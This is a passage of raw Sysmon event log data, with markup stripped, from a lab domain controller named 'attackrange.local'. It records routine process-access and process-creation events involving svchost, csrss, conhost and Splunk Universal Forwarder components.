Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+6b453|C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe+8e8530|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009187Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46F1-6000-F604-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009186Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009185Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009184Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009183Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009182Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009181Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009180Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009179Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009178Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009177Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4286-6000-0500-000000009A01}6361144C:\Windows\system32\csrss.exe{08A6967A-46F1-6000-F604-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009176Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.483{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46F1-6000-F604-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009175Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:17.484{08A6967A-46F1-6000-F604-000000009A01}5004C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000009216Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.843{08A6967A-46F2-6000-F804-000000009A01}33681264C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{08A6967A-4325-6000-B900-000000009A01}1176C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009215Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4325-6000-BD00-000000009A01}30161356C:\Windows\system32\conhost.exe{08A6967A-46F2-6000-F804-000000009A01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009214Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009213Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009212Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009211Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009210Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009209Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009208Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009207Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009206Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4287-6000-0C00-000000009A01}588704C:\Windows\system32\svchost.exe{08A6967A-4298-6000-2E00-000000009A01}2808C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78693|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6145c|C:\Windows\System32\RPCRT4.dll+52964|C:\Windows\System32\RPCRT4.dll+5187d|C:\Windows\System32\RPCRT4.dll+5212b|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x80000000000000009205Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4286-6000-0500-000000009A01}636752C:\Windows\system32\csrss.exe{08A6967A-46F2-6000-F804-000000009A01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a5a94|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x80000000000000009204Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.686{08A6967A-4325-6000-B900-000000009A01}11763752C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{08A6967A-46F2-6000-F804-000000009A01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6d64|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x80000000000000009203Microsoft-Windows-Sysmon/Operationalwin-dc-250.attackrange.local-2021-01-14 13:28:18.687{08A6967A-46F2-6000-F804-000000009A01}3368C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe8.0.2Registry monitorsplunk ApplicationSplunk Inc.splunk-regmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{08A6967A-4286-6000-E703-000000000000}0x3e70SystemMD5=91F33F605825B72EE2270559C7AB28F3,SHA256=3DF1CB71BB48B8669BD01179FD94DD8CC82F8103B08A0FACFD366E43E0C5FA42,IMPHASH=23D7D4307FBE7FA4F42B1902826D7C25{08A6967A-4325-6000-B900-000000009A01}1176C:\Program 